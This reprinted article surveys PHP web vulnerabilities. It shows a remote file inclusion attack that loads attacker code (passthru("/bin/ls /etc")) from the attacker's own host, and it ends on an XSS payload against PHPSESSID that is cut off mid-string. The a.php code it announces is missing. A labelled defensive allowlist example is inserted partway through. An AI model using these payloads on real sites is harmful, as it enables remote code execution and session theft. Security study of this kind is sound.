[Reprint] Summary of PHP website vulnerabilities

xiaoxiao2021-03-06  55

Judging from the current state of network security, the web page vulnerabilities everyone is most concerned about are probably those in ASP. Xiaozhu is the expert in that area, so I have no say there. PHP, however, also has very serious security problems, yet there are not many articles about them. Here I will briefly discuss the relevant vulnerabilities of PHP pages.

I have made a summary of the current PHP vulnerabilities, which roughly fall into the following types: file inclusion vulnerabilities, script command execution vulnerabilities, file disclosure vulnerabilities, and SQL injection vulnerabilities. General techniques such as cookie spoofing are not discussed here, since there is plenty of information about them online. So, let's analyze how these vulnerabilities are exploited!

First, let's discuss the file inclusion vulnerability. This vulnerability can be said to be characteristic of PHP. A remote attacker can use these vulnerabilities to execute arbitrary commands with the permissions of the web process. Let's take an example: assume that there is code like this in a.php: In this code, $include is generally a preset path, but we can construct a path ourselves to carry out the attack. For example, we submit: a.php?include=http://web/b.php, where web is the space we use for the attack and b.php is, of course, the code we use to attack. In b.php we can write something like: passthru("/bin/ls /etc"); and in this way carry out an attack for some purpose. (Note: the web server hosting b.php must not execute PHP code itself, otherwise there is a problem. For details, see <<How to attack the common vulnerabilities in the PHP program>>.) Many applications have had problems with this vulnerability, for example: PayPal Store Front, HotNews, Mambo Open Source, PhpDig, YABB SE, phpBB, InvisionBoard, SOLMETRA SPAW Editor, Les Visiteurs, PhpGedView, X-Cart, etc.
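A defensive counterpart to the inclusion flaw described above, as an added example that is not part of the original article: the request value is used only as a key into a fixed allowlist, so a value such as http://web/b.php never reaches include. The page names, resolve_include() and the temporary demo directory are hypothetical.

```php
<?php
// Added example, not code from the original article. All names are hypothetical.
declare(strict_types=1);

// The request parameter is only a key into this fixed map; it is never a path.
const PAGES = [
    'home'    => 'home.php',
    'news'    => 'news.php',
    'contact' => 'contact.php',
];

/** Return the absolute file to include for $requested, or null to refuse. */
function resolve_include(string $requested, string $baseDir): ?string
{
    if (!array_key_exists($requested, PAGES)) {
        return null; // URLs, traversal strings and unknown names all end here
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$requested]);
    if ($base === false || $path === false) {
        return null; // missing directory or file
    }
    // Defence in depth: a symlinked page must not resolve outside $baseDir.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// --- Demo on constructed input (temporary directory, dummy pages) ---
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'include_demo_' . getmypid();
mkdir($dir);
foreach (PAGES as $file) {
    file_put_contents($dir . DIRECTORY_SEPARATOR . $file, "constructed demo page\n");
}

// Remote inclusion additionally depends on this php.ini switch; keep it Off.
if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
    echo "WARNING: allow_url_include is enabled\n";
}

// Constructed request values; the second is the URL form the article describes.
foreach (['home', 'http://web/b.php', '../../etc/passwd', 'HOME'] as $value) {
    $target = resolve_include($value, $dir);
    printf("%-20s => %s\n", $value, $target ?? 'REFUSED');
    // A real page would now do: if ($target !== null) { include $target; }
}

// Clean up the demo files.
array_map('unlink', glob($dir . DIRECTORY_SEPARATOR . '*.php'));
rmdir($dir);
```

Run it with the PHP CLI; only the allowlisted key resolves to a file, and every other value is refused before any filesystem or network access takes place.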

Next, let's take a look at the script command execution vulnerability. It arises because URI parameters submitted by the user are not sufficiently filtered: submitting data that contains malicious HTML code can cause a cross-site scripting attack, which may obtain sensitive information of the target user. Let's give an example here too: in PHP Transparent on PHP 4.3.1 and earlier versions, the index.php page lacks sufficient filtering of PHPSESSID, and we can achieve the purpose of the attack with code like this: http://web/index.php?PHPSESSID=">